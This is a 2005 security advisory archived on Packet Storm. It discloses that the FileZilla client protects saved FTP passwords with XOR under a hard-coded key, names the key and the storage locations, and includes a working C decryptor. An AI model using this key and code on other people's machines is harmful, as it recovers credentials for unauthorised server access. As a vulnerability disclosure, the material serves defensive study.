exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

filezillaWeak.txt

filezillaWeak.txt
Posted Sep 5, 2005
Authored by Adrian Pastor | Site ikwt.com

The FileZilla client stores passwords using a weak XOR 'encryption'. The value of the cipher key is static and can be found in the source code. This vulnerability has been successfully tested on versions 2.2.14b and 2.2.15. However, it is suspected that most previous versions are also affected.

tags | exploit
SHA-256 | 637a74e948d0d2743a1666cf0c8f157510b94187658ebc3cb5fd4b191d073685

filezillaWeak.txt

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title: FileZilla weakly-encrypted password vulnerability
Risk: HIGH
Credits: pagvac (Adrian Pastor)
Date found: 6th August, 2005
Homepage: www.ikwt.com
www.adrianpv.com
E-mail: m123303[ - at - ]richmond.ac.uk


Background
- -----------
FileZilla is the most active and most downloaded open source FTP/SFTP
client (according to www.SourceForge.org at time of writing).
Currently
there is only a Windows version of this client.

For some stats visit:
http://sourceforge.net/top/mostactive.php?type=week
http://sourceforge.net/top/toplist.php?type=downloads_week

The project page can be found at:
http://sourceforge.net/projects/filezilla/

This advisory plus PoC code and executable can be found in the
following links:

http://www.ikwt.com/projects/filezilla-weak-encryption-research.zip
http://www.adrianpv.com/projects/filezilla-weak-encryption-research.zi
p

Versions affected
- -----------------
This vulnerability has been successfully tested on versions 2.2.14b
and 2.2.15. However, it is suspected that most previous versions are
also affected.


Vulnerability summary
- ---------------------
- - FileZilla client stores password using weak XOR "encryption"
- - The value of the cipher key is static (it never changes) and can
be found in the source code


Description of vulnerability
- ----------------------------
FileZilla saves configuration settings in two different locations:

- - in an XML file
- - in the Windows registry

The method used to save configuration settings depends on the
preferences used by the user during the installation of
FileZilla. Either way, all configuration settings are stored in
cleartext, EXCEPT for the password. However, the password
is stored using very weak XOR "encryption" which can be easily
reversed.

There exists a problem in the way the XOR encryption is implemented
because the same cipher key is always used. This key is
hard-coded, which means that anyone can analyze the source code of
the application and find it. Of course, this wouldn't be
so easy if FileZilla wasn't an open source application.

Once the key is known, an attacker can use it to decrypt the password
back to its cleartext form. Because the XOR cryptographic algorithm
used
is symmetric, the same key is used for both, encrypting and
decrypting.

As mentioned before, the rest of the configuration settings are all
in cleartext. Some information that would be useful for an
attacker includes hostname of the server to connect to, default port,
and username.

If successfully exploited, this vulnerability will allow an attacker
to access FTP (or SFTP) servers with the privileges of the user whose
configuration settings were stolen from.

In practice, this vulnerability could be exploited after a machine
has been compromised, or by fooling the user into executing malicious
code. Such code could dump the configuration settings, decrypt the
password/s
and sends them all to the attacker.

It is common to see many popular trojans out there that exploit weak
encryption vulnerabilities of this type. These trojans
dump the credentials of popular applications such as Internet
Explorer, VNC or even dialup connections. FileZilla could be
the next added application in the list of all those trojans with
password-dumping features.

This vulnerability is somehow similar to the one found by Conde
Vampiro in VNC 3 back in 1999. It's similar because in both
cases we find an open source application using a fixed cipher key to
decrypt passwords. Thus, making trivial to find the key.

For more information on Conde Vampiro's findings visit
http://www.securiteam.com/securitynews/3P5QERFQ0Q.html


Vulnerability details
- ---------------------
The XML configuration file is found at:

%programfiles%\FileZilla\FileZilla.xml

Where %programfiles% is the "program files" directory. This is
usually "c:\program files" by default.

The configuration settings are saved in the registry in:

Hive: HKEY_CURRENT_USER
Key: Software\FileZilla\Site Manager\[site_name]\

Where [site_name] is the name given to the connection by the user.

The password is saved in the previous key as a value with the
following properties:
Value: Pass
Type: REG_SZ (string terminated in NULL)


The cipher key can be found in Crypt.cpp and its value is:
"FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"


Solution
- --------
Choose "Use secure mode" during the installation (this disables
FileZilla from saving passwords), lockdown your client
machines where the FileZilla client is installed, or update to a
patched version which fixes this issue (if available).


PoC Code
- --------
/*

Filename: filezilla-pwdec.c
Title: FileZilla Client - Weakly encrypted password exploit v0.01
Author: pagvac (Adrian Pastor)
Date: 8th August, 2005
License: GPL
email: m123303[-a-t-]richmond.ac.uk
homepage: www.ikwt.com (In Knowledge We Trust)
www.adrianpv.com

Description: this tool asks the user for the "encrypted" password and
computes the cleartext version of the password

Other info: compile as a Win32 console application project in Visual
C++

Copyright (C) 2005 pagvac (Adrian Pastor)

This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
02110-1301, USA.

*/


//Includes
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>

//Macros
#define MAX_SIZE 150
#define SLEEP_TIME 5000

//Global variable (cypher key)
char *m_key = "FILEZILLA1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ";


//PRE: decimal values representing ASCII chars,
// every three digits becomes one ASCII char
// e.g.: 042040063063
//POST: ASCII chars are copied back to buff[]
// e.g.: *(??
// the length of the new string is returned
int digit2char(char buff[])
{
char tmp_buff[4], ascii_buff[MAX_SIZE];
unsigned int i=0, j=0, n=0, len=(strlen(buff)/3);
for(i=0,j=0;i<strlen(buff);i+=3,++j)
{
tmp_buff[0]=buff[i];
tmp_buff[1]=buff[i+1];
tmp_buff[2]=buff[i+2];
tmp_buff[3]='\0';

n=atoi(tmp_buff);
ascii_buff[j]=(char)n;
}
ascii_buff[j]='\0';
printf("ascii_buff:%s\n", ascii_buff);
strcpy(buff, ascii_buff);

return len;
}

//PRE: buffer containing ASCII chars of cypher
// (rather than their numberic ASCII value)
//POST:length of cleartext password is returned
unsigned int decrypt(char buff[])
{
unsigned int i, pos, len;

len=digit2char(buff);
pos=len%strlen(m_key);

for (i=0;i<len;i++)
buff[i]=buff[i]^m_key[(i+pos)%strlen(m_key)];

return len;
}

int main(void)
{
char cypher[MAX_SIZE];
unsigned int len=0,i=0;

printf("Enter cypher (encrypted password)\ne.g.:
120125125112000\n->");
scanf("%s", cypher);
if(strlen(cypher)%3==0)
{
len=decrypt(cypher);
printf("cleartext password:");
for(i=0;i<len;++i)
printf("%c",cypher[i]);
printf("\n");
}
else
{
printf("You didn't enter a valid cypher!\n");
printf("It should be a numeric value whose length is multiple of
3\n");
}

printf("Ending program in %d seconds...\n", SLEEP_TIME/1000);
Sleep(SLEEP_TIME);
return 0;
}

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com

iQA/AwUBQxho+LteQP8gtTAfEQI7JwCeNNjIc/wmQ8Dwbg6jjs0u/Iyh/GoAoJ24
bq4jAqPwakzJk+rrAdpFaxr0
=fWuP
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close